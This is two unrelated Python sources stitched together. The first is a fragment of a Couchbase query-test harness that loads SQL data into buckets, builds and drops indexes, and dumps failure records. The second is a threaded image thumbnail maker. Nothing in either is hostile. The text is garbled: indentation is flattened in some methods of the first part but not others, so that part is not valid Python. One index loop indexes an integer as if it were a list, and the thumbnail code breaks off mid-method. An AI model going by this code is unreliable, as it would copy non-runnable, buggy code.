def _run_explain_queries(self, n1ql_query=None, keyword ="", present=True):
run_result = {}
# Run n1ql query
n1ql = self.query_helper._add_explain_with_hints(n1ql_query)
self.log.info("Running query: " + n1ql)
message = "Pass"
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_explain(actual_result, keyword, present)
if not check:
if present:
message = " query {0} failed explain result, keyword {1} not found".format(n1ql_query, keyword)
else:
message = " query {0} failed explain result, keyword {1} was found but should not be present".format(n1ql_query, keyword)
self.log.info(message)
except Exception, ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for query: {0}".format(n1ql)
run_result[key] = {"success": check, "result": message}
return run_result
    def _initialize_cluster_setup(self):
        """Prepare data sources and cluster state for an RQG run.

        Loads data from MySQL/Postgres (or a file snapshot), constructs the
        n1ql helper, optionally tunes memory quotas and bucket limits via REST,
        then builds the configured indexes.
        """
        if self.use_mysql:
            self.log.info(" Will load directly from mysql")
            self._initialize_mysql_client()
            if not self.generate_input_only:
                self._setup_and_load_buckets()
        elif self.use_postgres:
            self._initialize_postgres_client()
            if not self.generate_input_only:
                self._setup_and_load_buckets()
        else:
            self.log.info(" Will load directly from file snap-shot")
            if self.populate_with_replay:
                self._initialize_mysql_client()
            self._setup_and_load_buckets_from_files()
        self.n1ql_helper = self._initialize_n1ql_helper()
        # create copy of simple table if this is a merge operation
        self.sleep(10)
        if self.gsi_type == "memory_optimized":
            # bump cluster and indexer memory quotas before index creation
            os.system("curl -X POST http://Administrator:password@{1}:8091/pools/default -d memoryQuota={0} -d indexMemoryQuota={2}".format(self.ram_quota, self.n1ql_server.ip, self.indexer_memQuota))
            self.sleep(10)
        if self.change_bucket_properties:
            shell = RemoteMachineShellConnection(self.master)
            # raise the cluster-wide maximum bucket count
            shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
            self.sleep(10, "Updating maxBucket count to 15")
        self._build_indexes()
    def _build_indexes(self):
        """Create primary/secondary indexes per test configuration.

        Index definitions come from the SQL client (mysql/postgres) or from a
        file. Meta indexes create one wide index per table (plus optional
        per-field ANSI-join indexes); otherwise the pre-generated per-table
        definitions are created either sequentially or on parallel threads.
        """
        self.sec_index_map = {}
        # canonical simple_table columns used for per-field ANSI-join indexes
        fields = ['primary_key_id','bool_field1','char_field1','datetime_field1','decimal_field1',
                  'int_field1','varchar_field1']
        if self.create_secondary_indexes:
            if self.use_mysql or self.use_postgres:
                self.sec_index_map = self.client._gen_index_combinations_for_tables(partitioned_indexes=self.partitioned_indexes)
            else:
                self.sec_index_map = self._extract_secondary_index_map_from_file(self.secondary_index_info_path)
        if not self.generate_input_only:
            if self.create_primary_index:
                self._build_primary_indexes(self.using_gsi)
            if self.create_secondary_meta_indexes:
                index_name = ""
                for table_name in self.sec_index_map.keys():
                    queries = {}
                    # one wide covering-style index named after the table
                    index_name = table_name
                    query = "CREATE INDEX {0} ON {1}(primary_key_id,bool_field1,char_field1," \
                            "datetime_field1," \
                            "decimal_field1,int_field1,varchar_field1)".format(table_name, self.database + "_" + table_name)
                    queries[index_name] = query
                    if self.create_secondary_ansi_join_indexes:
                        # plus one single-field index per column
                        for field in fields:
                            index_name = table_name+"_"+field
                            query = "CREATE INDEX {0} ON {1}({2})".format(table_name+"_"+field, self.database+"_"+table_name, field)
                            queries[index_name] = query
                    for index_name in queries.keys():
                        try:
                            self.n1ql_helper.run_cbq_query(query=queries[index_name],
                                                           server=self.n1ql_server, verbose=False)
                            # check is not inspected; failures surface via the except
                            check = self.n1ql_helper.is_index_online_and_in_list(self.database+"_"+table_name,
                                                                                 index_name ,
                                                                                 server=self.n1ql_server,
                                                                                 timeout=240)
                        except Exception, ex:
                            self.log.info(ex)
            if self.create_secondary_indexes and (not self.create_secondary_meta_indexes):
                thread_list = []
                if self.build_secondary_index_in_seq:
                    for table_name in self.sec_index_map.keys():
                        self._gen_secondary_indexes_per_table(self.database+"_"+table_name, self.sec_index_map[table_name], 0)
                else:
                    # one creation thread per table, joined before returning
                    for table_name in self.sec_index_map.keys():
                        t = threading.Thread(target=self._gen_secondary_indexes_per_table, args=(self.database+"_"+table_name, self.sec_index_map[table_name]))
                        t.daemon = True
                        t.start()
                        thread_list.append(t)
                    for t in thread_list:
                        t.join()
def _build_primary_indexes(self, using_gsi=True):
if self.create_primary_index:
if not self.partitioned_indexes:
self.n1ql_helper.create_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
else:
self.n1ql_helper.create_partitioned_primary_index(using_gsi=using_gsi, server=self.n1ql_server)
def _load_bulk_data_in_buckets_using_n1ql(self, bucket, data_set):
try:
n1ql_query = self.query_helper._builk_insert_statement_n1ql(bucket.name, data_set)
self.n1ql_helper.run_cbq_query(query=n1ql_query, server=self.n1ql_server, verbose=False)
except Exception, ex:
self.log.info('WARN=======================')
self.log.info(ex)
def _load_data_in_buckets_using_mc_bin_client_json(self, bucket, data_set):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
try:
for key in data_set.keys():
client.set(key.encode("utf8"), 0, 0, json.dumps(data_set[key]))
except Exception, ex:
self.log.info('WARN=======================')
self.log.info(ex)
    def _initialize_rqg_query_helper(self):
        """Factory for the RQG query-template helper."""
        return RQGQueryHelper()
def _initialize_n1ql_helper(self):
return N1QLHelper(version="sherlock", shell=None, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None, n1ql_port=getattr(self.n1ql_server, 'n1ql_port', 8903),
full_docs_list=[], log=self.log, input=self.input, master=self.master,
database=self.database, use_rest=self.use_rest)
    def _initialize_mysql_client(self):
        """Create the MySQL client; optionally reset and repopulate the database.

        When reset_database is set, the database name gets a random suffix, the
        schema definition SQL is replayed, and (for merge tests) the reference
        table is copied via _copy_table_for_merge().
        """
        if self.reset_database:
            self.client = RQGMySQLClient(host=self.mysql_url, user_id=self.user_id, password=self.password)
            if self.subquery:
                path = "b/resources/rqg/{0}/database_definition/definition-subquery.sql".format(self.database)
            else:
                path = "b/resources/rqg/{0}/database_definition/definition.sql".format(self.database)
            # randomize the database name so concurrent runs do not collide
            self.database = self.database+"_"+str(self.query_helper._random_int())
            populate_data = False
            if not self.populate_with_replay:
                populate_data = True
            if self.subquery:
                self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=1)
            else:
                self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=self.number_of_buckets)
            self._copy_table_for_merge()
        else:
            self.client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
    def _initialize_postgres_client(self):
        """Create a Postgres client and reset/populate its test database."""
        self.client = RQGPostgresClient()
        self.client.reset_database_add_data()
def _copy_table_for_merge(self):
table_list = self.client._get_table_list()
reference_table = table_list[0]
if self.merge_operation:
path = "b/resources/rqg/crud_db/database_definition/table_definition.sql"
self.client.database_add_data(database=self.database, sql_file_definiton_path=path)
table_list = self.client._get_table_list()
for table_name in table_list:
if table_name != reference_table:
sql = "INSERT INTO {0} SELECT * FROM {1}".format(table_name, reference_table)
self.client._insert_execute_query(sql)
table_list = self.client._get_table_list()
for table_name in table_list:
self.client_map[table_name] = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _generate_result(self, data):
result = ""
for key in data.keys():
result +="<<<<<<<<<< TEST {0} >>>>>>>>>>> \n".format(key)
for result_key in data[key].keys():
result += "{0} :: {1} \n".format(result_key, data[key][result_key])
return result
def _gen_secondary_indexes_per_table(self, table_name="", index_map={}, sleep_time=2):
if self.partitioned_indexes:
defer_mode = str({"defer_build": "true", "num_partition":2})
else:
defer_mode = str({"defer_build": "true"})
build_index_list = []
batch_index_definitions = index_map
if self.pushdown:
table_field_map = self.client._get_field_list_map_for_tables()
fields = table_field_map['simple_table']
combination_fields = sum([map(list, combinations(fields, i)) for i in range(len(fields) + 1)], [])
for x in xrange(1, len(combination_fields)):
input = combination_fields[x]
if len(input) == 1:
fields_indexed = str(input[0])
index_name = "ix_" + str(0) + str(x)
else:
fields_indexed = str(input[0])
#TODO: this code is really weird!
for i in xrange(1, len(input)):
index_name = "ix_" + str(i) + str(x)
fields_indexed = fields_indexed+"," + str(x[i])
if self.partitioned_indexes:
query = "CREATE INDEX {0} ON {1}({2}) PARTITION BY HASH(meta().id)".format(
index_name, table_name, fields_indexed)
else:
query = "CREATE INDEX {0} ON {1}({2})".format(index_name,
table_name,
fields_indexed)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
self.n1ql_helper.is_index_online_and_in_list(table_name, index_name, server=self.n1ql_server, timeout=240)
except Exception, ex:
self.log.info(ex)
if self.dynamic_indexing:
index_name = "idx_" + table_name
query = "CREATE INDEX {0} ON {1}(DISTINCT ARRAY v FOR v IN PAIRS(SELF) END) WITH {2}".format(index_name, table_name, defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
raise
else:
for index_name in batch_index_definitions.keys():
query = "{0} WITH {1}".format(
batch_index_definitions[index_name]["definition"],
defer_mode)
build_index_list.append(index_name)
self.log.info(" Running Query {0} ".format(query))
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server, verbose=False)
build_index_list.append(index_name)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
# Run Build Query
if build_index_list is not None and len(build_index_list) > 0:
batch_size = 0
end_index_batch = 0
total_indexes = 0
while total_indexes < len(build_index_list):
start_index_batch = end_index_batch
end_index_batch = min(end_index_batch+self.build_index_batch_size, len(build_index_list))
batch_size += 1
if start_index_batch == end_index_batch:
break
list_build_index_list = build_index_list[start_index_batch:end_index_batch]
total_indexes += len(list_build_index_list)
try:
build_query = "BUILD INDEX on {0}({1}) USING GSI".format(table_name, ",".join(list_build_index_list))
actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
self.log.info(actual_result)
self.sleep(15, "sleep after building index")
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
raise
self.sleep(sleep_time)
def _extract_secondary_index_map_from_file(self, file_path="/tmp/index.txt"):
with open(file_path) as data_file:
return json.load(data_file)
    def _generate_secondary_indexes_in_batches(self, batches):
        """Create all index definitions in batches as deferred, BUILD them, then
        wait until each is online.

        Skipped entirely in generate-input-only mode. Any create/build failure
        is re-raised after logging.
        """
        if self.generate_input_only:
            return
        defer_mode = str({"defer_build": "true"})
        if self.partitioned_indexes:
            defer_mode = str({"defer_build": "true", "num_partition":2})
        batch_index_definitions = {}
        build_index_list = []
        # add indexes to batch_index_definitions
        for info in batches:
            table_name = info["bucket"]
            batch_index_definitions.update(info["indexes"])
        for index_name in batch_index_definitions.keys():
            query = "{0} WITH {1}".format(batch_index_definitions[index_name]["definition"], defer_mode)
            query = query.replace("ON simple_table", "ON "+self.database+"_"+"simple_table")
            if self.aggregate_pushdown:
                query = query.replace("limit 10 offset 4", "")
            self.log.info(" Running Query {0} ".format(query))
            try:
                self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
                if index_name not in build_index_list:
                    build_index_list.append(index_name)
            except Exception, ex:
                self.log.info(ex)
                traceback.print_exc()
                raise
        # Run Build Query
        # NOTE(review): table_name here is whatever the *last* batch set --
        # assumes all batches share one bucket; confirm for multi-bucket runs
        if build_index_list is not None and len(build_index_list) > 0:
            try:
                build_query = "BUILD INDEX on {0}({1}) USING GSI".format(self.database+"_"+table_name, ",".join(build_index_list))
                actual_result = self.n1ql_helper.run_cbq_query(query=build_query, server=self.n1ql_server)
                self.log.info(actual_result)
            except Exception, ex:
                self.log.info(ex)
                traceback.print_exc()
                raise
            # Monitor till the index is built
            tasks = []
            try:
                for info in batches:
                    table_name = info["bucket"]
                    table_name = self.database+"_"+table_name
                    for index_name in info["indexes"]:
                        if index_name in build_index_list:
                            tasks.append(self.async_monitor_index(bucket=table_name, index_name=index_name))
                for task in tasks:
                    task.result()
            except Exception, ex:
                traceback.print_exc()
                self.log.info(ex)
    def async_monitor_index(self, bucket, index_name=None):
        """Start an async task waiting for index_name on bucket to come online;
        returns the task (caller invokes .result() to block)."""
        monitor_index_task = self.cluster.async_monitor_index(server=self.n1ql_server, bucket=bucket,
                                                              n1ql_helper=self.n1ql_helper, index_name=index_name)
        return monitor_index_task
def are_any_indexes_present(self, index_name_list):
query_response = self.n1ql_helper.run_cbq_query("SELECT * FROM system:indexes")
current_indexes = [i['indexes']['name'] for i in query_response['results']]
for index_name in index_name_list:
if index_name in current_indexes:
return True
return False
    def wait_for_index_drop(self, index_name_list):
        """Block until none of index_name_list remains in system:indexes (up to 30 tries, 1s apart)."""
        self.with_retry(lambda: self.are_any_indexes_present(index_name_list), eval=False, delay=1, tries=30)
def with_retry(self, func, eval=True, delay=5, tries=10):
attempts = 0
while attempts < tries:
attempts = attempts + 1
res = func()
if res == eval:
return res
else:
self.sleep(delay, 'incorrect results, sleeping for %s' % delay)
raise Exception('timeout, invalid results: %s' % res)
def _drop_secondary_indexes_in_batches(self, batches):
dropped_indexes = []
for info in batches:
table_name = info["bucket"]
table_name = self.database+"_"+table_name
for index_name in info["indexes"].keys():
if index_name not in dropped_indexes:
query = "DROP INDEX {0}.{1} USING {2}".format(table_name, index_name,
info["indexes"][index_name]["type"])
try:
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server,
query_params={'timeout': '900s'})
dropped_indexes.append(index_name)
except Exception, ex:
self.log.info("Error: " + str(ex))
self.wait_for_index_drop(info["indexes"].keys())
def _analyze_result(self, result):
check = True
failure_types = []
message = "\n ____________________________________________________\n "
for key in result.keys():
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and key!="check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: " + str(result[key]["result"]) + "\n"
if key == "check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: Secondary index is not in use\n"
return check, message, failure_types
def _check_and_push_failure_record_queue(self, result, data, failure_record_queue):
if not self.record_failure:
return
for key in result.keys():
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and not result[key]["success"]:
failure_record_queue.put(data)
    def dump_failure_data(self, failure_record_queue):
        """Persist failing test inputs, index definitions, and a database dump
        under a random subdirectory of self.failure_record_path.

        No-op unless self.record_failure is set.
        """
        if not self.record_failure:
            return
        import uuid  # local import kept from original
        sub_dir = str(uuid.uuid4()).replace("-","")
        self.data_dump_path = self.failure_record_path+"/"+sub_dir
        os.mkdir(self.data_dump_path)
        input_file_path = self.data_dump_path+"/input"
        os.mkdir(input_file_path)
        f_write_file = open(input_file_path+"/source_input_rqg_run.txt",'w')
        secondary_index_path = self.data_dump_path+"/index"
        os.mkdir(secondary_index_path)
        database_dump = self.data_dump_path+"/db_dump"
        os.mkdir(database_dump)
        f_write_index_file = open(secondary_index_path+"/secondary_index_definitions.txt",'w')
        client = None
        if self.use_mysql:
            client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
        elif self.use_postgres:
            client = RQGPostgresClient()
        client.dump_database(data_dump_path=database_dump)
        client._close_connection()
        f_write_index_file.write(json.dumps(self.sec_index_map))
        f_write_index_file.close()
        # drain the queue of failing test records, one JSON object per line
        while not failure_record_queue.empty():
            f_write_file.write(json.dumps(failure_record_queue.get())+"\n")
        f_write_file.close()
def unzip_template(self, template_path):
    """Extract a zipped template archive in place.

    If *template_path* does not point at a ``.zip`` file it is returned
    unchanged.  Otherwise the archive is extracted into its containing
    directory and the path without the trailing ``.zip`` is returned.
    """
    # BUG FIX: the original tested `"zip" not in template_path`, which
    # misclassifies any path that merely contains the substring "zip"
    # (e.g. "/zips/template.txt") and would then fail in ZipFile below.
    if not template_path.endswith(".zip"):
        return template_path
    # Extract next to the archive itself.
    output_path = template_path[:template_path.rfind("/") + 1]
    with zipfile.ZipFile(template_path, "r") as z:
        z.extractall(output_path)
    # Strip only the trailing ".zip" (the original stripped every occurrence).
    return template_path[:-len(".zip")]
def _setup_and_load_buckets_from_files(self):
    """Recreate Couchbase buckets from a zipped database dump and load them.

    Unzips ``self.db_dump_path`` into a sibling ``data_dump`` directory (one
    JSON file per bucket), replaces any existing buckets with ones named
    after the dump files, then loads each file's documents via the mc bin
    client.  When ``populate_with_replay`` is set the same rows are also
    replayed into the SQL backend.
    """
    bucket_list = []
    #Unzip the files and get bucket list
    tokens = self.db_dump_path.split("/")
    data_file_path = self.db_dump_path.replace(tokens[len(tokens)-1], "data_dump")
    os.mkdir(data_file_path)
    with zipfile.ZipFile(self.db_dump_path, "r") as z:
        z.extractall(data_file_path)
    # Bucket name := dump file name without its extension.
    onlyfiles = [f for f in listdir(data_file_path) if isfile(join(data_file_path, f))]
    for file in onlyfiles:
        bucket_list.append(file.split(".")[0])
    # Remove any previous buckets
    for bucket in self.buckets:
        self.rest.delete_bucket(bucket.name)
    self.buckets = []
    # Create New Buckets
    self._create_buckets(self.master, bucket_list, server_id=None, bucket_size=None)
    # Wait till the buckets are up
    self.sleep(15)
    # Read Data from mysql database and populate the couchbase server
    for bucket_name in bucket_list:
        for bucket in self.buckets:
            if bucket.name == bucket_name:
                file_path = data_file_path+"/"+bucket_name+".txt"
                with open(file_path) as data_file:
                    data = json.load(data_file)
                    self._load_data_in_buckets_using_mc_bin_client_json(bucket, data)
                    if self.populate_with_replay:
                        # Mirror every document into the SQL side as well.
                        for key in data.keys():
                            insert_sql = self.query_helper._generate_insert_statement_from_data(bucket_name, data[key])
                            self.client._insert_execute_query(insert_sql)
    # Clean up the temporary extraction directory.
    shutil.rmtree(data_file_path, ignore_errors=True)
def fill_advise_dict(self, bucket_list=None):
    """Assign the next free advise bucket to each not-yet-mapped bucket name.

    Consumes entries from ``self.advise_buckets`` (front first) and records
    the assignment in ``self.advise_dict``; names already mapped are skipped.
    """
    # BUG FIX: the original used a mutable default argument (bucket_list=[]);
    # replaced with the None-sentinel idiom (behavior for callers unchanged).
    if bucket_list is None:
        bucket_list = []
    for bucket in bucket_list:
        if bucket not in self.advise_dict:
            # pop(0) == read [0] then remove first equal element, as before.
            self.advise_dict[bucket] = self.advise_buckets.pop(0)
def _setup_and_load_buckets(self):
    """Mirror the SQL tables into Couchbase buckets for querying.

    Reads the table/primary-key map from the SQL client, creates one bucket
    per table (name prefixed with the database name), then copies every row
    into its bucket.  In subquery mode only the first table is used and it
    is loaded with nested test documents instead.
    """
    # Remove any previous buckets
    # NOTE(review): deletion runs only when skip_setup_cleanup is set, which
    # reads inverted relative to the comment above - confirm intent.
    if self.skip_setup_cleanup:
        for bucket in self.buckets:
            self.rest.delete_bucket(bucket.name)
        self.buckets = []
    # Memory-optimized GSI / custom bucket properties need a fixed quota.
    if self.change_bucket_properties or self.gsi_type == "memory_optimized":
        bucket_size = 100
    else:
        bucket_size = None
    if self.change_bucket_properties:
        shell = RemoteMachineShellConnection(self.master)
        # Raise the node's bucket limit so one bucket per table fits.
        shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
        self.sleep(10, "Updating maxBucket count to 25")
    # Pull information about tables from mysql database and interpret them as no-sql dbs
    table_key_map = self.client._get_primary_key_map_for_tables()
    # Make a list of buckets that we want to create for querying
    bucket_list = table_key_map.keys()
    self.log.info("database used is {0}".format(self.database))
    new_bucket_list = []
    for bucket in bucket_list:
        if bucket.find("copy_simple_table") > 0:
            new_bucket_list.append(self.database+"_"+"copy_simple_table")
        else:
            new_bucket_list.append(self.database + "_" + bucket)
        if self.subquery:
            # Subquery tests only need the first table's bucket.
            break
    # Create New Buckets
    self.fill_advise_dict(new_bucket_list)
    self._create_buckets(self.master, new_bucket_list, server_id=None, bucket_size=bucket_size)
    self.log.info("buckets created")
    # Wait till the buckets are up
    self.sleep(5)
    # Keep only the buckets we just created.
    self.buckets = self.rest.get_buckets()
    self.newbuckets = []
    for bucket in self.buckets:
        if bucket.name in new_bucket_list:
            self.newbuckets.append(bucket)
    self.log.info("safe to start another job")
    self.record_db = {}
    self.buckets = self.newbuckets
    # Read Data from mysql database and populate the couchbase server
    for bucket_name in bucket_list:
        query = "select * from {0}".format(bucket_name)
        columns, rows = self.client._execute_query(query=query)
        self.record_db[bucket_name] = self.client._gen_json_from_results_with_primary_key(columns, rows, primary_key=table_key_map[bucket_name])
        if self.subquery:
            for bucket in self.newbuckets:
                if bucket.name == self.database+"_"+bucket_name:
                    self.load_subquery_test_data(bucket)
        else:
            for bucket in self.newbuckets:
                if bucket.name == self.database+"_"+bucket_name:
                    self._load_bulk_data_in_buckets_using_n1ql(bucket, self.record_db[bucket_name])
def _populate_delta_buckets(self, table_name = "simple_table"):
    """Reset *table_name* on both the SQL and Couchbase sides, then
    repopulate each from its ``copy_simple_table`` counterpart so the two
    stay in sync for delta comparisons.
    """
    # Extra tables get a dedicated SQL client; the default shares self.client.
    if table_name != "simple_table":
        client = self.client_map[table_name]
    else:
        client = self.client
    # Clear the SQL table and the matching Couchbase bucket.
    query = "delete from {0} where primary_key_id is not null".format(table_name)
    client._insert_execute_query(query=query)
    query = "delete from {0} where primary_key_id is not null".format(self.database+"_"+table_name)
    self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server, verbose=True)
    # Repopulate the bucket from the copy bucket via INSERT ... SELECT.
    insert_sql = "insert into {0}(KEY k ,VALUE b) SELECT meta(b).id as k, b from {1} b where primary_key_id is not null".format(self.database+"_"+table_name,self.database+"_"+"copy_simple_table")
    if self.use_advisor:
        self.create_secondary_index("SELECT meta(b).id as k, b from {0} b where primary_key_id is not null".format(self.database+"_"+"copy_simple_table"))
    try:
        self.log.info("n1ql query is {0}".format(insert_sql))
        self.n1ql_helper.run_cbq_query(query=insert_sql, server=self.n1ql_server, verbose=True)
        # Mirror the same repopulation on the SQL side.
        insert_sql = "INSERT INTO {0} SELECT * FROM copy_simple_table".format(table_name)
        client._insert_execute_query(insert_sql)
    except Exception, ex:  # Python 2 syntax; failures are logged, not fatal
        self.log.info(ex)
def load_subquery_test_data(self, bucket):
    """Build nested test documents for subquery tests.

    For every row of ``simple_table_1`` this creates two matching order rows
    in a (new, if absent) ``simple_table_2`` SQL table and inserts a single
    document into *bucket* that embeds both orders under a
    ``simple_table_2`` array, so N1QL subqueries can be validated against
    the SQL side.
    """
    query = 'select primary_key_id from simple_table_1'
    result = self.client._execute_sub_query(query)
    primary_key_values = result
    # Child table keyed by order_id with an FK back to simple_table_1.
    query = 'CREATE TABLE IF NOT EXISTS {0}.`simple_table_2` ' \
            '(`order_id` VARCHAR(100) NOT NULL,`qty` INT(11) NULL DEFAULT NULL,`productId` VARCHAR(1000) NOT NULL' \
            ',`price` DECIMAL(10,0) NOT NULL,`primary_key_id` VARCHAR(100) NOT NULL,PRIMARY KEY (`order_id`),' \
            'FOREIGN KEY (`primary_key_id`) REFERENCES `simple_table_1`(`primary_key_id`))'.format(self.database)
    self.client._db_execute_query(query)
    for primary_key_value in primary_key_values:
        # Fetch the parent row's fields, one column per query.
        query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
        result = self.client._execute_sub_query(query)
        varchar_field = result
        query = 'select decimal_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
        result = self.client._execute_sub_query(query)
        decimal_field_value = result
        query = 'select int_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
        result = self.client._execute_sub_query(query)
        int_field_value = result
        query = 'select datetime_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
        result = self.client._execute_sub_query(query)
        datetime_field_value = result
        query = 'select bool_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
        result = self.client._execute_sub_query(query)
        bool_field_value = bool(result)
        query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
        result = self.client._execute_sub_query(query)
        varchar_value = result
        query = 'select char_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
        result = self.client._execute_sub_query(query)
        char_value = result
        # Two synthetic orders per parent row, with randomised qty/price.
        orderid1 = "order-" + varchar_field
        orderid2 = "order-" + str(self.query_helper._random_char()) + "_"+str(self.query_helper._random_int()) + varchar_field
        price1 = self.query_helper._random_float()+10
        price2 = self.query_helper._random_float()+100
        qty1 = self.query_helper._random_int()
        qty2 = self.query_helper._random_int()
        query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "snack", %s, %s)' % (orderid1, qty1, price1, primary_key_value)
        self.client._insert_execute_query(query)
        query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "lunch", %s, %s)' % (orderid2, qty2, price2, primary_key_value)
        self.client._insert_execute_query(query)
        # Couchbase document embedding both orders as a nested array.
        n1ql_insert_template = 'INSERT INTO %s (KEY, VALUE) VALUES ' \
            '("%s", {"primary_key_id": "%s" ,"decimal_field1":%s,"int_field1":%s,' \
            '"datetime_field1":"%s","bool_field1":%s,"varchar_field1":"%s",' \
            '"char_field1":"%s","simple_table_2":[{"order_id":"%s","qty":%s,' \
            '"productId":"snack","price":%s,"primary_key_id":"%s"},' \
            '{"order_id":"%s","qty":%s,"productId":"lunch","price":%s,' \
            '"primary_key_id":"%s"}] } )'\
            % (bucket.name,primary_key_value, primary_key_value, decimal_field_value,
               int_field_value, datetime_field_value, bool_field_value, varchar_value,
               char_value, orderid1, qty1, price1, primary_key_value, orderid2, qty2,
               price2, primary_key_value)
        self.n1ql_helper.run_cbq_query(query=n1ql_insert_template, server=self.n1ql_server)
|
thumbnail_maker.py
|
# thumbnail_maker.py
import logging
import os
import time
from queue import Empty, Queue
from threading import Thread
from urllib.parse import urlparse
from urllib.request import urlretrieve

import PIL
from PIL import Image
FORMAT = "[%(threadName)s, %(asctime)s, %(levelname)s] %(message)s"
logging.basicConfig(filename='logfile.log', level=logging.DEBUG, format=FORMAT)
class ThumbnailMakerService(object):
    """Download images and produce fixed-width thumbnails of each.

    Two queues coordinate the work:

    * ``dl_queue`` holds URLs waiting to be downloaded.
    * ``img_queue`` holds downloaded filenames waiting to be resized;
      a ``None`` sentinel tells the resize worker to stop.
    """

    def __init__(self, home_dir='.'):
        # Images are read from <home>/incoming and written to <home>/outgoing.
        self.home_dir = home_dir
        self.input_dir = self.home_dir + os.path.sep + 'incoming'
        self.output_dir = self.home_dir + os.path.sep + 'outgoing'
        self.img_queue = Queue()
        self.dl_queue = Queue()

    def download_image(self):
        """Worker loop: download queued URLs into the input dir, handing each
        saved filename to ``img_queue`` for resizing."""
        while not self.dl_queue.empty():
            try:
                url = self.dl_queue.get(block=False)
                img_filename = urlparse(url).path.split('/')[-1]
                dest_path = self.input_dir + os.path.sep + img_filename
                urlretrieve(url, dest_path)
                self.img_queue.put(img_filename)
                logging.info("downloading images at URL " + url)
                self.dl_queue.task_done()
            except Empty:
                # BUG FIX: Queue.get(block=False) raises queue.Empty; the
                # original caught ``Queue.Empty`` (an attribute the Queue
                # *class* does not have), which itself raised AttributeError
                # whenever the race between empty() and get() was lost.
                logging.info("Queue empty")

    def download_images(self, img_url_list):
        """Sequentially download every URL, then enqueue the ``None`` sentinel.

        No-op for an empty or falsy url list.
        """
        if not img_url_list:
            return
        os.makedirs(self.input_dir, exist_ok=True)
        logging.info("beginning image downloads")
        start = time.perf_counter()
        for url in img_url_list:
            img_filename = urlparse(url).path.split('/')[-1]
            dest_path = self.input_dir + os.path.sep + img_filename
            urlretrieve(url, dest_path)
            self.img_queue.put(img_filename)
        end = time.perf_counter()
        self.img_queue.put(None)  # tell the resize worker it can finish
        logging.info("downloaded {} images in {} seconds".format(len(img_url_list), end - start))

    def perform_resizing(self):
        """Worker loop: resize each queued image to 32/64/200px widths
        (preserving aspect ratio) until the ``None`` sentinel arrives.

        Originals are deleted from the input dir after resizing.
        """
        os.makedirs(self.output_dir, exist_ok=True)
        logging.info("beginning image resizing")
        target_sizes = [32, 64, 200]
        num_images = len(os.listdir(self.input_dir))
        start = time.perf_counter()
        while True:
            filename = self.img_queue.get()
            if filename:
                logging.info("resizing image {}".format(filename))
                orig_img = Image.open(self.input_dir + os.path.sep + filename)
                for basewidth in target_sizes:
                    img = orig_img
                    # calculate target height of the resized image to maintain the aspect ratio
                    wpercent = (basewidth / float(img.size[0]))
                    hsize = int((float(img.size[1]) * float(wpercent)))
                    # perform resizing
                    img = img.resize((basewidth, hsize), PIL.Image.LANCZOS)
                    # save with a suffixed name, e.g. photo.png -> photo_64.png
                    new_filename = os.path.splitext(filename)[0] + \
                        '_' + str(basewidth) + os.path.splitext(filename)[1]
                    img.save(self.output_dir + os.path.sep + new_filename)
                os.remove(self.input_dir + os.path.sep + filename)
                logging.info("done resizing image {}".format(filename))
                self.img_queue.task_done()
            else:
                # Sentinel received: acknowledge it and stop the loop.
                self.img_queue.task_done()
                break
        end = time.perf_counter()
        logging.info("created {} thumbnails in {} seconds".format(num_images, end - start))

    def make_thumbnails(self, img_url_list):
        """Run downloads (4 threads) and resizing (1 thread) concurrently."""
        logging.info("START make_thumbnails")
        start = time.perf_counter()
        for img_url in img_url_list:
            self.dl_queue.put(img_url)
        num_dl_threads = 4
        for _ in range(num_dl_threads):
            t = Thread(target=self.download_image)
            t.start()
